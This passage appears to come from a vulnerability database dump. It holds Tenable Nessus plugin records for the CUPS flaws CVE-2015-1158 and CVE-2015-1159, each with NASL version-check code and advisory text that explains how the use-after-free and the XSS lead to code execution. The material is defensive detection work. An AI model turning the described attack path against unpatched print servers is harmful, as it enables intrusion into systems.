Changes include :\n\nSecurity: Fixed CERT VU #810572/CVE-2015-1158/CVE-2015-1159 exploiting\nthe dynamic linker (STR #4609)\n\nSecurity: The scheduler could hang with malformed gzip data (STR\n#4602)", "edition": 22, "published": "2015-06-10T00:00:00", "title": "FreeBSD : cups -- multiple vulnerabilities (a40ec970-0efa-11e5-90e4-d050996490d0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-10T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:cups-base", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_A40EC9700EFA11E590E4D050996490D0.NASL", "href": "https://www.tenable.com/plugins/nessus/84070", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84070);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n\n script_name(english:\"FreeBSD : cups -- multiple vulnerabilities (a40ec970-0efa-11e5-90e4-d050996490d0)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CUPS development team reports :\n\nThe new release addresses two security vulnerabilities, add\nlocalizations for German and Russian, and includes several general bug\nfixes. 
Changes include :\n\nSecurity: Fixed CERT VU #810572/CVE-2015-1158/CVE-2015-1159 exploiting\nthe dynamic linker (STR #4609)\n\nSecurity: The scheduler could hang with malformed gzip data (STR\n#4602)\"\n );\n # https://cups.org/blog.php?L1082\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.cups.org/blog/2015-06-08-cups-2.0.3.html\"\n );\n # https://www.kb.cert.org/vuls/id/810572\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.kb.cert.org/vuls/id/810572/\"\n );\n # https://vuxml.freebsd.org/freebsd/a40ec970-0efa-11e5-90e4-d050996490d0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?405b2fa9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:cups-base\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"cups-base<2.0.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T09:43:27", "description": "Two critical vulnerabilities have been found in the CUPS printing\nsystem :\n\nCVE-2015-1158 - Improper Update of Reference Count Cupsd uses\nreference-counted strings with global scope. When parsing a print job\nrequest, cupsd over-decrements the reference count for a string from\nthe request. As a result, an attacker can prematurely free an\narbitrary string of global scope. They can use this to dismantle\nACL’s protecting privileged operations, and upload a replacement\nconfiguration file, and subsequently run arbitrary code on a target\nmachine.\n\nThis bug is exploitable in default configurations, and does not\nrequire any special permissions other than the basic ability to print.\n\nCVE-2015-1159 - Cross-Site Scripting A cross-site scripting bug in the\nCUPS templating engine allows the above bug to be exploited when a\nuser browses the web. 
This XSS is reachable in the default\nconfiguration for Linux instances of CUPS, and allows an attacker to\nbypass default configuration settings that bind the CUPS scheduler to\nthe ‘localhost’ or loopback interface.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 14, "published": "2015-06-10T00:00:00", "title": "Debian DLA-239-1 : cups security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-10T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:libcupsdriver1", "p-cpe:/a:debian:debian_linux:cups-client", "p-cpe:/a:debian:debian_linux:cups", "p-cpe:/a:debian:debian_linux:libcupsimage2", "p-cpe:/a:debian:debian_linux:libcupsmime1", "p-cpe:/a:debian:debian_linux:libcupscgi1-dev", "p-cpe:/a:debian:debian_linux:libcups2", "p-cpe:/a:debian:debian_linux:libcupsppdc1", "p-cpe:/a:debian:debian_linux:cups-common", "p-cpe:/a:debian:debian_linux:libcups2-dev", "p-cpe:/a:debian:debian_linux:cups-ppdc", "p-cpe:/a:debian:debian_linux:cups-dbg", "p-cpe:/a:debian:debian_linux:libcupscgi1", "p-cpe:/a:debian:debian_linux:cupsddk", "p-cpe:/a:debian:debian_linux:libcupsdriver1-dev", "p-cpe:/a:debian:debian_linux:libcupsimage2-dev", "p-cpe:/a:debian:debian_linux:libcupsppdc1-dev", "p-cpe:/a:debian:debian_linux:cups-bsd", "p-cpe:/a:debian:debian_linux:libcupsmime1-dev"], "id": "DEBIAN_DLA-239.NASL", "href": "https://www.tenable.com/plugins/nessus/84061", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-239-1. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84061);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098, 75106);\n\n script_name(english:\"Debian DLA-239-1 : cups security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two critical vulnerabilities have been found in the CUPS printing\nsystem :\n\nCVE-2015-1158 - Improper Update of Reference Count Cupsd uses\nreference-counted strings with global scope. When parsing a print job\nrequest, cupsd over-decrements the reference count for a string from\nthe request. As a result, an attacker can prematurely free an\narbitrary string of global scope. They can use this to dismantle\nACL’s protecting privileged operations, and upload a replacement\nconfiguration file, and subsequently run arbitrary code on a target\nmachine.\n\nThis bug is exploitable in default configurations, and does not\nrequire any special permissions other than the basic ability to print.\n\nCVE-2015-1159 - Cross-Site Scripting A cross-site scripting bug in the\nCUPS templating engine allows the above bug to be exploited when a\nuser browses the web. This XSS is reachable in the default\nconfiguration for Linux instances of CUPS, and allows an attacker to\nbypass default configuration settings that bind the CUPS scheduler to\nthe ‘localhost’ or loopback interface.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. 
Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2015/06/msg00003.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze-lts/cups\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-bsd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cups-ppdc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cupsddk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcups2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcups2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupscgi1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupscgi1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsdriver1\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsdriver1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsimage2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsimage2-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsmime1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsmime1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsppdc1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libcupsppdc1-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"cups\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-bsd\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-client\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", 
prefix:\"cups-common\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-dbg\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cups-ppdc\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"cupsddk\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcups2\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcups2-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupscgi1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupscgi1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsdriver1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsdriver1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsimage2\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsimage2-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsmime1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsmime1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsppdc1\", reference:\"1.4.4-7+squeeze8\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libcupsppdc1-dev\", reference:\"1.4.4-7+squeeze8\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T01:38:28", "description": "According to its banner, the CUPS printer service running on the\nremote host is a version prior to 2.0.3. 
It is, therefore, potentially\naffected by the following vulnerabilities :\n\n - A privilege escalation vulnerability exists due to a\n flaw in cupsd when handling printer job request errors.\n An unauthenticated, remote attacker can exploit this,\n with a specially crafted request, to prematurely free an\n arbitrary string of global scope, creating a dangling\n pointer to a repurposed block of memory on the heap, \n causing ACL verification to fail when parsing\n 'admin/conf' and 'admin' ACLs. This allows an attacker\n to upload a replacement CUPS configuration file.\n (CVE-2015-1158)\n\n - A cross-site scripting vulnerability exists due to\n improper sanitization of user-supplied input to the\n 'QUERY' parameter of the help page. This allows a remote\n attacker, with a specially crafted request, to execute\n arbitrary script code. (CVE-2015-1159)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.", "edition": 27, "published": "2015-06-12T00:00:00", "title": "CUPS < 2.0.3 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/a:apple:cups"], "id": "CUPS_2_0_3.NASL", "href": "https://www.tenable.com/plugins/nessus/84149", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84149);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098);\n script_xref(name:\"CERT\", value:\"810572\");\n\n script_name(english:\"CUPS < 2.0.3 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the CUPS server version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote printer service is potentially affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"According to its banner, the CUPS printer service running on the\nremote host is a version prior to 2.0.3. It is, therefore, potentially\naffected by the following vulnerabilities :\n\n - A privilege escalation vulnerability exists due to a\n flaw in cupsd when handling printer job request errors.\n An unauthenticated, remote attacker can exploit this,\n with a specially crafted request, to prematurely free an\n arbitrary string of global scope, creating a dangling\n pointer to a repurposed block of memory on the heap, \n resulting ACL verification to fail when parsing\n 'admin/conf' and 'admin' ACLs. This allows an attacker\n to upload a replacement CUPS configuration file.\n (CVE-2015-1158)\n\n - A cross-site scripting vulnerability exists due to\n improper sanitization of user-supplied input to the\n 'QUERY' parameter of the help page. This allows a remote\n attacker, with a specially crafted request, to execute\n arbitrary script code. (CVE-2015-1159)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cups.org/blog.php?L1082\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/apple/cups/issues/4609\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to CUPS version 2.0.3 or later. 
Alternatively, apply the patch\nprovided by the vendor.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-1158\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:cups\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"cups_1_3_5.nasl\");\n script_require_keys(\"www/cups\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 631);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:631, embedded:TRUE);\nget_kb_item_or_exit(\"www/\"+port+\"/cups/running\");\n\nversion = get_kb_item_or_exit(\"cups/\"+port+\"/version\");\nsource = get_kb_item_or_exit(\"cups/\"+port+\"/source\");\n\nif (version =~ \"^(2|2\\.0)($|[^0-9br.])\") audit(AUDIT_VER_NOT_GRANULAR, \"CUPS\", port, version);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# Affected :\n# x.x.x < 2.0.3\nif (\n version =~ \"^1\\.\" ||\n version =~ \"^2\\.0\\.[0-2]($|[^0-9.])\" ||\n version =~ \"^2\\.0(rc|b)\"\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 2.0.3' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"CUPS\", port, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:13:51", "description": "This update fixed 2 security flaws.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 17, "published": "2015-06-22T00:00:00", "title": "Fedora 21 : cups-1.7.5-17.fc21 (2015-9801)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-22T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:cups"], "id": "FEDORA_2015-9801.NASL", "href": "https://www.tenable.com/plugins/nessus/84311", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-9801.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84311);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_xref(name:\"FEDORA\", value:\"2015-9801\");\n\n script_name(english:\"Fedora 21 : cups-1.7.5-17.fc21 (2015-9801)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixed 2 security flaws.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1221641\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1221642\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160577.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dda586f0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"cups-1.7.5-17.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cups\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:28:53", "description": "It was discovered that CUPS incorrectly handled reference counting\nwhen handling localized strings. A remote attacker could use this\nissue to escalate permissions, upload a replacement CUPS configuration\nfile, and execute arbitrary code. (CVE-2015-1158)\n\nIt was discovered that the CUPS templating engine contained a\ncross-site scripting issue. A remote attacker could use this issue to\nbypass default configuration settings. (CVE-2015-1159).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "published": "2015-06-11T00:00:00", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 14.10 / 15.04 : cups vulnerabilities (USN-2629-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-1158", "CVE-2015-1159"], "modified": "2015-06-11T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:15.04", "cpe:/o:canonical:ubuntu_linux:14.10", "p-cpe:/a:canonical:ubuntu_linux:cups", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2629-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84117", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2629-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84117);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(75098);\n script_xref(name:\"USN\", value:\"2629-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS / 14.04 LTS / 14.10 / 15.04 : cups vulnerabilities (USN-2629-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that CUPS incorrectly handled reference counting\nwhen handling localized strings. 
A remote attacker could use this\nissue to escalate permissions, upload a replacement CUPS configuration\nfile, and execute arbitrary code. (CVE-2015-1158)\n\nIt was discovered that the CUPS templating engine contained a\ncross-site scripting issue. A remote attacker could use this issue to\nbypass default configuration settings. (CVE-2015-1159).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2629-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 